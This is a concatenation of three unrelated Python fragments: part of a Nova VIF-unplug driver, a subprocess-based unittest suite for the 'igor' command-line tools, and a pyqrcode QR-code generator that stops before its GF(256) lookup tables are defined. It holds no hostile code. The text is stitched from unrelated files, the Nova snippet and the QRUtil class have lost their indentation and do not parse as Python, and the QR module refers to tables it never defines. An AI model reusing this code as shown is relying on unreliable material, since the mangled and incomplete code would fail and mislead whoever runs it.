try:
utils.execute('vrouter-port-control', cmd_args, run_as_root=True)
linux_net.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(
_LE("Failed while unplugging vif"), instance=instance)
def unplug(self, instance, vif):
vif_type = vif['type']
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance,
'vif': vif})
if vif_type is None:
raise exception.NovaException(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'unplug_%s' % vif_slug, None)
if not func:
raise exception.NovaException(
_("Unexpected vif_type=%s") % vif_type)
func(instance, vif)
| |
import unittest
import os
import sys
import socket
import shutil
import subprocess
import time
# Absolute path of the fixture directory that sits next to this test module.
FIXTURES = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'fixtures')
class IgorCmdlineTest(unittest.TestCase):
    """Drive the igor command-line tools as subprocesses.

    The test_2xx methods past test_207 are integration tests and must run
    in order: they initialize a database, start a server, exercise it and
    finally stop it.
    """

    igorDir = os.path.join(FIXTURES, 'testIgorCmd')
    igorHostname = socket.gethostname()
    igorHostname2 = 'localhost'
    igorPort = 49333
    igorProtocol = "https"
    igorVarArgs = {}
    igorUseCapabilities = False
    credentials = ['--credentials', 'admin:']
    # Background subprocesses started via the 'async' option; kept on the
    # class so tearDownClass can reap them.
    processes = []

    @classmethod
    def setUpClass(cls):
        # Start from a clean database directory and log file.
        shutil.rmtree(cls.igorDir, True)
        try:
            os.unlink(os.path.join(FIXTURES, 'test_igor_cmdline.log'))
        except OSError:
            # Log file may not exist yet; that's fine.  (Was a bare
            # "except:", which also swallowed unrelated errors.)
            pass
        cls.igorUrl = "%s://%s:%d/data/" % (cls.igorProtocol, cls.igorHostname, cls.igorPort)

    @classmethod
    def tearDownClass(cls):
        # Give the server a moment to exit after the 'stop' test, then
        # force-kill anything still running.
        time.sleep(5)
        for proc in cls.processes:
            if proc.poll() is None:
                print('Warning: process has not terminated, killing it:', proc)
                proc.terminate()
                proc.wait()

    def _runCommand(self, command, options, *args):
        """Run *command* as "python -m <command>" with flags from *options*.

        options is a set that may contain:
          addDir/addUrl/addPort/addCredentials - append the matching flags
          read  - capture and return stdout (text)
          async - start in background (tracked in cls.processes), return 0
        Otherwise the subprocess exit status is returned.
        """
        logFile = os.path.join(FIXTURES, 'test_igor_cmdline.log')
        if 'IGOR_TEST_PYTHON' in os.environ:
            cmdHead = [os.environ['IGOR_TEST_PYTHON']]
        else:
            cmdHead = [sys.executable]
        cmd = cmdHead + ["-m", command]
        if 'addDir' in options:
            cmd += ["-d", self.igorDir]
        if 'addUrl' in options:
            cmd += ["-u", self.igorUrl]
        if 'addPort' in options:
            cmd += ["-p", str(self.igorPort)]
        if 'addCredentials' in options:
            cmd += self.credentials
            # Trust our self-signed server certificate, if it exists yet.
            certFileName = os.path.join(self.igorDir, "igor.crt")
            if os.path.exists(certFileName):
                cmd += ["--certificate", certFileName]
        cmd += list(args)
        with open(logFile, 'a') as logFP:
            print('+', ' '.join(cmd), file=logFP)
            logFP.flush()
            if 'read' in options:
                proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=logFP, universal_newlines=True)
                rv = proc.communicate()
                proc.wait()
                return rv[0]
            elif 'async' in options:
                proc = subprocess.Popen(cmd, stdout=logFP, stderr=subprocess.STDOUT)
                self.processes.append(proc)
                return 0
            else:
                return subprocess.call(cmd, stdout=logFP, stderr=subprocess.STDOUT)

    def test_200_igorServer_help(self):
        """check igorServer --help"""
        data = self._runCommand("igor", {"read"}, "--help")
        self.assertIn("show this help message", data)

    def test_201_igorSetup_help(self):
        """check igorSetup --help"""
        data = self._runCommand("igorSetup", {"read"}, "--help")
        self.assertIn("show this help message", data)

    def test_202_igorControl_help(self):
        """check igorControl --help"""
        data = self._runCommand("igorControl", {"read"}, "--help")
        self.assertIn("show this help message", data)

    def test_203_igorVar_help(self):
        """check igorVar --help"""
        data = self._runCommand("igorVar", {"read"}, "--help")
        self.assertIn("show this help message", data)

    def test_204_igorCA_help(self):
        """check igorCA --help"""
        data = self._runCommand("igorCA", {"read"}, "--help")
        self.assertIn("show this help message", data)

    def test_205_igorServlet_help(self):
        """check igorServlet --help"""
        data = self._runCommand("igorServlet", {"read"}, "--help")
        self.assertIn("show this help message", data)

    def test_206_igorSetup_helpcmd(self):
        """check igorSetup help"""
        data = self._runCommand("igorSetup", {"read"}, "help")
        self.assertIn("help - this message", data)

    def test_207_igorCA_helpcmd(self):
        """check igorCA help"""
        data = self._runCommand("igorCA", {"read"}, "help")
        self.assertIn("Show list of available commands", data)

    #
    # NOTE: these are integration tests, not really unittests. From here on the
    # tests need to be run in order.
    #
    def test_210_igorSetup_initialize(self):
        """Initialize database"""
        sts = self._runCommand("igorSetup", {"addDir"}, "initialize")
        self.assertEqual(sts, 0)

    def test_211_igorSetup_addstd(self):
        """Add standard plugin"""
        sts = self._runCommand("igorSetup", {"addDir"}, "addstd", "systemHealth")
        self.assertEqual(sts, 0)

    def test_212_igorSetup_liststd(self):
        """list standard plugins"""
        sts = self._runCommand("igorSetup", {"addDir"}, "liststd")
        self.assertEqual(sts, 0)

    def test_213_igorSetup_list(self):
        """list installed plugins"""
        sts = self._runCommand("igorSetup", {"addDir"}, "list")
        self.assertEqual(sts, 0)

    def test_220_igorSetup_certificateSelfsigned(self):
        """Create self-signed certificate for igor"""
        if self.igorProtocol == "http":
            raise unittest.SkipTest("no https support tested")
        sts = self._runCommand("igorSetup", {"addDir"}, "--run", "certificateSelfsigned", "/CN=%s" % self.igorHostname, self.igorHostname, "localhost", "127.0.0.1")
        self.assertEqual(sts, 0)

    def test_230_start_igor(self):
        """Start the igor server"""
        sts = self._runCommand("igor", {"addDir", "addPort", "async"})
        time.sleep(5)
        self.assertEqual(sts, 0)

    def test_241_igorControl_helpcmd(self):
        """Try the igorControl help command"""
        data = self._runCommand("igorControl", {"addUrl", "addCredentials", "data", "read"}, "help")
        self.assertIn("Show list of all internal commands", data)

    def test_242_igorControl_save(self):
        """Try the igorControl save command"""
        sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "save")
        self.assertEqual(sts, 0)

    def test_243_igorControl_dump(self):
        """Try the igorControl dump command"""
        sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "dump")
        self.assertEqual(sts, 0)

    def test_244_igorControl_log(self):
        """Try the igorControl log command"""
        sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "log")
        self.assertEqual(sts, 0)

    def test_245_igorControl_flush(self):
        """Try the igorControl flush command"""
        sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "flush")
        self.assertEqual(sts, 0)

    def test_251_igorVar_put_text(self):
        """Use igorVar to put a text/plain value"""
        sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--put", "text/plain", "--data", "text data", "sandbox/text")
        self.assertEqual(sts, 0)

    def test_252_igorVar_put_json(self):
        """Use igorVar to put a application/json value"""
        sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--put", "application/json", "--data", '{"json" : "json data"}', "sandbox/json")
        self.assertEqual(sts, 0)

    def test_253_igorVar_put_xml(self):
        """Use igorVar to put a application/xml value"""
        sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--put", "application/xml", "--data", "<xml>xml data</xml>", "sandbox/xml")
        self.assertEqual(sts, 0)

    def test_254_igorVar_post_text(self):
        """Use igorVar to post two text/plain values"""
        sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--post", "text/plain", "--data", "first post text", "sandbox/posttext")
        self.assertEqual(sts, 0)
        sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--post", "text/plain", "--data", "second post text", "sandbox/posttext")
        self.assertEqual(sts, 0)

    def test_261_igorVar_get_text(self):
        """Use igorVar to get a plaintext value for all three values stored above"""
        data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/text")
        self.assertIn("text data", data)
        data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/json")
        self.assertIn("json data", data)
        data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/xml")
        self.assertIn("xml data", data)
        data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/posttext")
        self.assertIn("first post text", data)
        self.assertIn("second post text", data)

    def test_299_stop_igor(self):
        """Try the igorControl stop command"""
        sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "stop")
        self.assertEqual(sts, 0)
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main()
| |
#
# pyqrcode.py
#
# David Janes
# Discover Anywhere Mobile
# 2010-11-25
#
# This is a fork of QRCode for Python
#
# qrcode = pyqrcode.QRCode.Make(URL)
# image = qrcode.make_image()
#
#
import math
from PIL import Image, ImageDraw
#QRCode for Python
#
#Ported from the Javascript library by Sam Curren
#
#QRCode for Javascript
#http://d-project.googlecode.com/svn/trunk/misc/qrcode/js/qrcode.js
#
#Copyright (c) 2009 Kazuhiko Arase
#
#URL: http://www.d-project.com/
#
#Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# The word "QR Code" is registered trademark of
# DENSO WAVE INCORPORATED
# http://www.denso-wave.com/qrcode/faqpatent-e.html
class QRMode:
    """QR data-encoding mode indicator bits (one flag per mode)."""
    MODE_NUMBER = 0b0001
    MODE_ALPHA_NUM = 0b0010
    MODE_8BIT_BYTE = 0b0100
    MODE_KANJI = 0b1000
class QRErrorCorrectLevel:
    """Error-correction level codes as they appear in the format info."""
    L = 1  # lowest recovery capability
    M = 0
    Q = 3
    H = 2  # highest recovery capability
class CodeLengthOverflowError(Exception):
    """Raised when the payload needs more bits than the symbol provides."""

    def __init__(self, bits, maxbits):
        self.bits = bits        # bits required by the payload
        self.maxbits = maxbits  # bits available in the chosen symbol

    def __str__(self):
        return "CodeLengthOverflowError(bits=%d,maxbits=%d)" % (
            self.bits, self.maxbits)
class QR8bitByte:
    """A chunk of payload encoded in 8-bit byte mode."""

    def __init__(self, data):
        self.mode = QRMode.MODE_8BIT_BYTE
        self.data = data

    def getLength(self):
        return len(self.data)

    def write(self, buffer):
        # Emit every character as a raw 8-bit value (no JIS handling).
        for ch in self.data:
            buffer.put(ord(ch), 8)

    def __repr__(self):
        return self.data
# Module-level switch for debug chatter from MakeQR.
VERBOSE = False
def MakeQR(data, minTypeNumber = 0, errorCorrectLevel = QRErrorCorrectLevel.Q, verbose = False):
    """Build a QRCode for *data*, growing the type number until it fits.

    When minTypeNumber is 0 a starting size is estimated from the payload
    length (tuned for level Q, tends to overestimate).  Returns a made
    QRCode, or None if the data does not fit within 50 size increments.
    NOTE(review): the *verbose* parameter is unused (the VERBOSE global is
    consulted instead); kept for interface compatibility.
    """
    import sys
    if minTypeNumber == 0:
        bits_needed = (len(data) + 1) * 8
        minTypeNumber = int((bits_needed + 50) / 100)
    # Bug fix: this function used Python-2-only syntax (xrange,
    # "except X, x", "print >>") and referenced sys without importing it.
    for attempt in range(0, 50):
        try:
            qr = QRCode(minTypeNumber + attempt, errorCorrectLevel)
            qr.addData(data)
            qr.make()
            return qr
        except CodeLengthOverflowError as exc:
            # The data did not fit at this size; try one type larger.
            if VERBOSE:
                sys.stderr.write(
                    "QRCode.Make - bad guess - trying again %s\n" % (exc,))
            continue
    # Original behavior preserved: fall through to None after 50 attempts.
def MakeQRImage(data, minTypeNumber = 0, errorCorrectLevel = QRErrorCorrectLevel.Q, **ad):
    """Convenience wrapper: build a QR code and render it as a PIL image.

    Extra keyword arguments are forwarded to QRCode.make_image().
    """
    return MakeQR(data, minTypeNumber, errorCorrectLevel).make_image(**ad)
class QRCode(object):
    """QR Code symbol builder, ported from Kazuhiko Arase's JS library.

    Typical use:
        qr = QRCode(typeNumber, QRErrorCorrectLevel.Q)
        qr.addData("...")
        qr.make()
        image = qr.make_image()
    """

    def __init__(self, typeNumber, errorCorrectLevel):
        self.typeNumber = typeNumber            # symbol version (1..40)
        self.errorCorrectLevel = errorCorrectLevel
        self.modules = None                     # 2-D grid of True/False/None
        self.moduleCount = 0
        self.dataCache = None                   # lazily-built codewords
        self.dataList = []                      # queued data segments

    def addData(self, data):
        """Queue *data* as an 8-bit byte segment; invalidates the cache."""
        newData = QR8bitByte(data)
        self.dataList.append(newData)
        self.dataCache = None

    def isDark(self, row, col):
        """Return the module at (row, col); False when out of bounds."""
        if (row < 0 or self.moduleCount <= row or col < 0 or self.moduleCount <= col):
            return False
        return self.modules[row][col]

    def getModuleCount(self):
        return self.moduleCount

    def make(self):
        """Build the final module matrix with the best-scoring mask."""
        self.makeImpl(False, self.getBestMaskPattern())

    def makeImpl(self, test, maskPattern):
        """(Re)build the module matrix using *maskPattern*.

        With test=True only layout is produced so masks can be scored.
        """
        # Symbol is square; size grows 4 modules per type (type 1 = 21x21).
        self.moduleCount = self.typeNumber * 4 + 17
        self.modules = [[None] * self.moduleCount
                        for _ in range(self.moduleCount)]
        # Fixed patterns first, then format/version info, then the payload.
        self.setupPositionProbePattern(0, 0)
        self.setupPositionProbePattern(self.moduleCount - 7, 0)
        self.setupPositionProbePattern(0, self.moduleCount - 7)
        self.setupPositionAdjustPattern()
        self.setupTimingPattern()
        self.setupTypeInfo(test, maskPattern)
        if (self.typeNumber >= 7):
            self.setupTypeNumber(test)
        if (self.dataCache is None):
            self.dataCache = QRCode.createData(self.typeNumber, self.errorCorrectLevel, self.dataList)
        self.mapData(self.dataCache, maskPattern)

    def setupPositionProbePattern(self, row, col):
        """Draw a 7x7 finder pattern (plus separator ring) at (row, col)."""
        for r in range(-1, 8):
            if (row + r <= -1 or self.moduleCount <= row + r): continue
            for c in range(-1, 8):
                if (col + c <= -1 or self.moduleCount <= col + c): continue
                if ((0 <= r and r <= 6 and (c == 0 or c == 6))
                        or (0 <= c and c <= 6 and (r == 0 or r == 6))
                        or (2 <= r and r <= 4 and 2 <= c and c <= 4)):
                    self.modules[row + r][col + c] = True
                else:
                    self.modules[row + r][col + c] = False

    def getBestMaskPattern(self):
        """Try all 8 masks and return the one with the lowest penalty."""
        minLostPoint = 0
        pattern = 0
        for i in range(8):
            self.makeImpl(True, i)
            lostPoint = QRUtil.getLostPoint(self)
            if (i == 0 or minLostPoint > lostPoint):
                minLostPoint = lostPoint
                pattern = i
        return pattern

    def createMovieClip(self):
        raise Exception("Method not relevant to Python port")

    def make_image(self,
            mode = "RGBA", bg = "white", fg = "black", block_in_pixels = 10, border_in_blocks = 4, rounding = 0,
            tl = True, bl = True, br = True, tr = True,
        ):
        """Render the symbol as a PIL image.

        tl/bl/br/tr allow individual corners not to be rounded when
        *rounding* (a pixel radius) is used.
        """
        ## http://nadiana.com/pil-tutorial-basic-advanced-drawing
        def round_corner(radius, fg, bg):
            """Draw a round corner"""
            corner = Image.new('RGBA', (radius, radius), bg)
            draw = ImageDraw.Draw(corner)
            draw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, fill=fg)
            return corner

        def round_rectangle(size, radius, fg, bg, tl = True, bl = True, br = True, tr = True):
            """Draw a rounded rectangle"""
            width, height = size
            corner = round_corner(radius, fg, bg)
            rectangle = Image.new('RGBA', size, fg)
            if tl: rectangle.paste(corner, (0, 0))
            if bl: rectangle.paste(corner.rotate(90), (0, height - radius))
            if br: rectangle.paste(corner.rotate(180), (width - radius, height - radius))
            if tr: rectangle.paste(corner.rotate(270), (width - radius, 0))
            return rectangle

        # Bug fix: the original reassigned block_in_pixels/border_in_blocks
        # to constants here, silently ignoring the caller's arguments.
        pixelsize = (self.getModuleCount() + border_in_blocks + border_in_blocks) * block_in_pixels
        im = Image.new(mode, (pixelsize, pixelsize), bg)
        d = ImageDraw.Draw(im)
        rr = None
        if rounding > 0:
            rr = round_rectangle((block_in_pixels, block_in_pixels,), rounding, fg, bg)
        for r in range(self.getModuleCount()):
            for c in range(self.getModuleCount()):
                if not self.isDark(r, c):
                    continue
                x = (c + border_in_blocks) * block_in_pixels
                y = (r + border_in_blocks) * block_in_pixels
                b = [(x, y), (x + block_in_pixels, y + block_in_pixels)]
                # Bug fix: the original tested "round > 0", comparing the
                # builtin round() function instead of the rounding argument
                # (a TypeError on Python 3, always-true on Python 2).
                if rounding > 0:
                    # Round only the corners that do not touch a neighbour.
                    rr = round_rectangle(
                        (block_in_pixels, block_in_pixels,),
                        rounding,
                        fg, bg,
                        tl = not (self.isDark(r - 1, c) or self.isDark(r, c - 1)) and tl,
                        bl = not (self.isDark(r, c - 1) or self.isDark(r + 1, c)) and bl,
                        tr = not (self.isDark(r - 1, c) or self.isDark(r, c + 1)) and tr,
                        br = not (self.isDark(r + 1, c) or self.isDark(r, c + 1)) and br,
                    )
                    im.paste(rr, (x, y))
                else:
                    d.rectangle(b, fill=fg)
        del d
        return im

    def setupTimingPattern(self):
        """Alternate dark/light along row 6 and column 6."""
        for r in range(8, self.moduleCount - 8):
            if (self.modules[r][6] is not None):
                continue
            self.modules[r][6] = (r % 2 == 0)
        for c in range(8, self.moduleCount - 8):
            if (self.modules[6][c] is not None):
                continue
            self.modules[6][c] = (c % 2 == 0)

    def setupPositionAdjustPattern(self):
        """Draw the 5x5 alignment patterns for this type number."""
        pos = QRUtil.getPatternPosition(self.typeNumber)
        for i in range(len(pos)):
            for j in range(len(pos)):
                row = pos[i]
                col = pos[j]
                # Skip centres that fall inside a finder pattern.
                if (self.modules[row][col] is not None):
                    continue
                for r in range(-2, 3):
                    for c in range(-2, 3):
                        if (r == -2 or r == 2 or c == -2 or c == 2 or (r == 0 and c == 0)):
                            self.modules[row + r][col + c] = True
                        else:
                            self.modules[row + r][col + c] = False

    def setupTypeNumber(self, test):
        """Place the 18-bit version information (types >= 7 only)."""
        bits = QRUtil.getBCHTypeNumber(self.typeNumber)
        for i in range(18):
            mod = (not test and ((bits >> i) & 1) == 1)
            self.modules[i // 3][i % 3 + self.moduleCount - 8 - 3] = mod
        for i in range(18):
            mod = (not test and ((bits >> i) & 1) == 1)
            self.modules[i % 3 + self.moduleCount - 8 - 3][i // 3] = mod

    def setupTypeInfo(self, test, maskPattern):
        """Place the 15-bit format information (EC level + mask)."""
        data = (self.errorCorrectLevel << 3) | maskPattern
        bits = QRUtil.getBCHTypeInfo(data)
        #// vertical
        for i in range(15):
            mod = (not test and ((bits >> i) & 1) == 1)
            if (i < 6):
                self.modules[i][8] = mod
            elif (i < 8):
                self.modules[i + 1][8] = mod
            else:
                self.modules[self.moduleCount - 15 + i][8] = mod
        #// horizontal
        for i in range(15):
            mod = (not test and ((bits >> i) & 1) == 1)
            if (i < 8):
                self.modules[8][self.moduleCount - i - 1] = mod
            elif (i < 9):
                self.modules[8][15 - i - 1 + 1] = mod
            else:
                self.modules[8][15 - i - 1] = mod
        #// fixed module
        self.modules[self.moduleCount - 8][8] = (not test)

    def mapData(self, data, maskPattern):
        """Fill data modules in the two-column zig-zag order of the spec."""
        inc = -1
        row = self.moduleCount - 1
        bitIndex = 7
        byteIndex = 0
        for col in range(self.moduleCount - 1, 0, -2):
            if (col == 6): col -= 1  # skip the vertical timing column
            while (True):
                for c in range(2):
                    if (self.modules[row][col - c] is None):
                        dark = False
                        if (byteIndex < len(data)):
                            dark = (((data[byteIndex] >> bitIndex) & 1) == 1)
                        mask = QRUtil.getMask(maskPattern, row, col - c)
                        if (mask):
                            dark = not dark
                        self.modules[row][col - c] = dark
                        bitIndex -= 1
                        if (bitIndex == -1):
                            byteIndex += 1
                            bitIndex = 7
                row += inc
                if (row < 0 or self.moduleCount <= row):
                    # Bounce off the edge and move to the next column pair.
                    row -= inc
                    inc = -inc
                    break

    PAD0 = 0xEC
    PAD1 = 0x11

    @staticmethod
    def createData(typeNumber, errorCorrectLevel, dataList):
        """Encode *dataList* into padded codewords plus RS error correction.

        :raises CodeLengthOverflowError: when the data does not fit.
        """
        rsBlocks = QRRSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
        buffer = QRBitBuffer()
        for i in range(len(dataList)):
            data = dataList[i]
            buffer.put(data.mode, 4)
            buffer.put(data.getLength(), QRUtil.getLengthInBits(data.mode, typeNumber))
            data.write(buffer)
        #// calc num max data.
        totalDataCount = 0
        for i in range(len(rsBlocks)):
            totalDataCount += rsBlocks[i].dataCount
        if (buffer.getLengthInBits() > totalDataCount * 8):
            raise CodeLengthOverflowError(bits = buffer.getLengthInBits(), maxbits = totalDataCount * 8)
        #// end code
        if (buffer.getLengthInBits() + 4 <= totalDataCount * 8):
            buffer.put(0, 4)
        #// padding to a byte boundary
        while (buffer.getLengthInBits() % 8 != 0):
            buffer.putBit(False)
        #// padding with the alternating pad codewords
        while (True):
            if (buffer.getLengthInBits() >= totalDataCount * 8):
                break
            buffer.put(QRCode.PAD0, 8)
            if (buffer.getLengthInBits() >= totalDataCount * 8):
                break
            buffer.put(QRCode.PAD1, 8)
        return QRCode.createBytes(buffer, rsBlocks)

    @staticmethod
    def createBytes(buffer, rsBlocks):
        """Split codewords into RS blocks, add EC words, and interleave."""
        offset = 0
        maxDcCount = 0
        maxEcCount = 0
        dcdata = [0 for x in range(len(rsBlocks))]
        ecdata = [0 for x in range(len(rsBlocks))]
        for r in range(len(rsBlocks)):
            dcCount = rsBlocks[r].dataCount
            ecCount = rsBlocks[r].totalCount - dcCount
            maxDcCount = max(maxDcCount, dcCount)
            maxEcCount = max(maxEcCount, ecCount)
            dcdata[r] = [0 for x in range(dcCount)]
            for i in range(len(dcdata[r])):
                dcdata[r][i] = 0xff & buffer.buffer[i + offset]
            offset += dcCount
            # Error-correction words are the remainder of the data
            # polynomial modulo the RS generator polynomial.
            rsPoly = QRUtil.getErrorCorrectPolynomial(ecCount)
            rawPoly = QRPolynomial(dcdata[r], rsPoly.getLength() - 1)
            modPoly = rawPoly.mod(rsPoly)
            ecdata[r] = [0 for x in range(rsPoly.getLength() - 1)]
            for i in range(len(ecdata[r])):
                modIndex = i + modPoly.getLength() - len(ecdata[r])
                if (modIndex >= 0):
                    ecdata[r][i] = modPoly.get(modIndex)
                else:
                    ecdata[r][i] = 0
        totalCodeCount = 0
        for i in range(len(rsBlocks)):
            totalCodeCount += rsBlocks[i].totalCount
        # Interleave: data words block by block, then EC words.
        data = [None for x in range(totalCodeCount)]
        index = 0
        for i in range(maxDcCount):
            for r in range(len(rsBlocks)):
                if (i < len(dcdata[r])):
                    data[index] = dcdata[r][i]
                    index += 1
        for i in range(maxEcCount):
            for r in range(len(rsBlocks)):
                if (i < len(ecdata[r])):
                    data[index] = ecdata[r][i]
                    index += 1
        return data
class QRMaskPattern:
    """The eight mask-pattern identifiers defined by the QR specification."""
    (PATTERN000, PATTERN001, PATTERN010, PATTERN011,
     PATTERN100, PATTERN101, PATTERN110, PATTERN111) = range(8)
class QRUtil(object):
PATTERN_POSITION_TABLE = [
[],
[6, 18],
[6, 22],
[6, 26],
[6, 30],
[6, 34],
[6, 22, 38],
[6, 24, 42],
[6, 26, 46],
[6, 28, 50],
[6, 30, 54],
[6, 32, 58],
[6, 34, 62],
[6, 26, 46, 66],
[6, 26, 48, 70],
[6, 26, 50, 74],
[6, 30, 54, 78],
[6, 30, 56, 82],
[6, 30, 58, 86],
[6, 34, 62, 90],
[6, 28, 50, 72, 94],
[6, 26, 50, 74, 98],
[6, 30, 54, 78, 102],
[6, 28, 54, 80, 106],
[6, 32, 58, 84, 110],
[6, 30, 58, 86, 114],
[6, 34, 62, 90, 118],
[6, 26, 50, 74, 98, 122],
[6, 30, 54, 78, 102, 126],
[6, 26, 52, 78, 104, 130],
[6, 30, 56, 82, 108, 134],
[6, 34, 60, 86, 112, 138],
[6, 30, 58, 86, 114, 142],
[6, 34, 62, 90, 118, 146],
[6, 30, 54, 78, 102, 126, 150],
[6, 24, 50, 76, 102, 128, 154],
[6, 28, 54, 80, 106, 132, 158],
[6, 32, 58, 84, 110, 136, 162],
[6, 26, 54, 82, 110, 138, 166],
[6, 30, 58, 86, 114, 142, 170]
]
G15 = (1 << 10) | (1 << 8) | (1 << 5) | (1 << 4) | (1 << 2) | (1 << 1) | (1 << 0)
G18 = (1 << 12) | (1 << 11) | (1 << 10) | (1 << 9) | (1 << 8) | (1 << 5) | (1 << 2) | (1 << 0)
G15_MASK = (1 << 14) | (1 << 12) | (1 << 10) | (1 << 4) | (1 << 1)
@staticmethod
def getBCHTypeInfo(data):
d = data << 10;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) >= 0):
d ^= (QRUtil.G15 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) ) )
return ( (data << 10) | d) ^ QRUtil.G15_MASK
@staticmethod
def getBCHTypeNumber(data):
d = data << 12;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) >= 0):
d ^= (QRUtil.G18 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) ) )
return (data << 12) | d
@staticmethod
def getBCHDigit(data):
digit = 0;
while (data != 0):
digit += 1
data >>= 1
return digit
@staticmethod
def getPatternPosition(typeNumber):
return QRUtil.PATTERN_POSITION_TABLE[typeNumber - 1]
@staticmethod
def getMask(maskPattern, i, j):
if maskPattern == QRMaskPattern.PATTERN000 : return (i + j) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN001 : return i % 2 == 0
if maskPattern == QRMaskPattern.PATTERN010 : return j % 3 == 0
if maskPattern == QRMaskPattern.PATTERN011 : return (i + j) % 3 == 0
if maskPattern == QRMaskPattern.PATTERN100 : return (math.floor(i / 2) + math.floor(j / 3) ) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN101 : return (i * j) % 2 + (i * j) % 3 == 0
if maskPattern == QRMaskPattern.PATTERN110 : return ( (i * j) % 2 + (i * j) % 3) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN111 : return ( (i * j) % 3 + (i + j) % 2) % 2 == 0
raise Exception("bad maskPattern:" + maskPattern);
@staticmethod
def getErrorCorrectPolynomial(errorCorrectLength):
a = QRPolynomial([1], 0);
for i in range(errorCorrectLength):
a = a.multiply(QRPolynomial([1, QRMath.gexp(i)], 0) )
return a
@staticmethod
def getLengthInBits(mode, type):
if 1 <= type and type < 10:
#// 1 - 9
if mode == QRMode.MODE_NUMBER : return 10
if mode == QRMode.MODE_ALPHA_NUM : return 9
if mode == QRMode.MODE_8BIT_BYTE : return 8
if mode == QRMode.MODE_KANJI : return 8
raise Exception("mode:" + mode)
elif (type < 27):
#// 10 - 26
if mode == QRMode.MODE_NUMBER : return 12
if mode == QRMode.MODE_ALPHA_NUM : return 11
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 10
raise Exception("mode:" + mode)
elif (type < 41):
#// 27 - 40
if mode == QRMode.MODE_NUMBER : return 14
if mode == QRMode.MODE_ALPHA_NUM : return 13
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 12
raise Exception("mode:" + mode)
else:
raise Exception("type:" + type)
@staticmethod
def getLostPoint(qrCode):
moduleCount = qrCode.getModuleCount();
lostPoint = 0;
#// LEVEL1
for row in range(moduleCount):
for col in range(moduleCount):
sameCount = 0;
dark = qrCode.isDark(row, col);
for r in range(-1, 2):
if (row + r < 0 or moduleCount <= row + r):
continue
for c in range(-1, 2):
if (col + c < 0 or moduleCount <= col + c):
continue
if (r == 0 and c == 0):
continue
if (dark == qrCode.isDark(row + r, col + c) ):
sameCount+=1
if (sameCount > 5):
lostPoint += (3 + sameCount - 5)
#// LEVEL2
for row in range(moduleCount - 1):
for col in range(moduleCount - 1):
count = 0;
if (qrCode.isDark(row, col ) ): count+=1
if (qrCode.isDark(row + 1, col ) ): count+=1
if (qrCode.isDark(row, col + 1) ): count+=1
if (qrCode.isDark(row + 1, col + 1) ): count+=1
if (count == 0 or count == 4):
lostPoint += 3
#// LEVEL3
for row in range(moduleCount):
for col in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row, col + 1)
and qrCode.isDark(row, col + 2)
and qrCode.isDark(row, col + 3)
and qrCode.isDark(row, col + 4)
and not qrCode.isDark(row, col + 5)
and qrCode.isDark(row, col + 6) ):
lostPoint += 40
for col in range(moduleCount):
for row in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row + 1, col)
and qrCode.isDark(row + 2, col)
and qrCode.isDark(row + 3, col)
and qrCode.isDark(row + 4, col)
and not qrCode.isDark(row + 5, col)
and qrCode.isDark(row + 6, col) ):
lostPoint += 40
#// LEVEL4
darkCount = 0;
for col in range(moduleCount):
for row in range(moduleCount):
if (qrCode.isDark(row, col) ):
darkCount+=1
ratio = abs(100 * darkCount / moduleCount / moduleCount - 50) / 5
lostPoint += ratio * 10
return lostPoint
class QRMath:
    """Galois field GF(256) log/antilog helpers for Reed-Solomon coding.

    Relies on the module-level EXP_TABLE and LOG_TABLE lookup tables.
    """

    @staticmethod
    def glog(n):
        """Return the discrete logarithm of `n` in GF(256).

        Raises Exception for n < 1, where the logarithm is undefined.
        """
        if (n < 1):
            # Bug fix: the original concatenated a str with an int
            # ("glog(" + n + ")"), raising TypeError and hiding the
            # intended diagnostic.
            raise Exception("glog(%s)" % n)
        return LOG_TABLE[n]

    @staticmethod
    def gexp(n):
        """Return the antilog of `n`, first reducing `n` modulo 255 into range."""
        while n < 0:
            n += 255
        while n >= 256:
            n -= 255
        return EXP_TABLE[n]
# Antilog (EXP_TABLE) and log (LOG_TABLE) tables over GF(256) for the QR
# generator polynomial: exp[i] = exp[i-4] ^ exp[i-5] ^ exp[i-6] ^ exp[i-8]
# after seeding the first eight entries with powers of two.
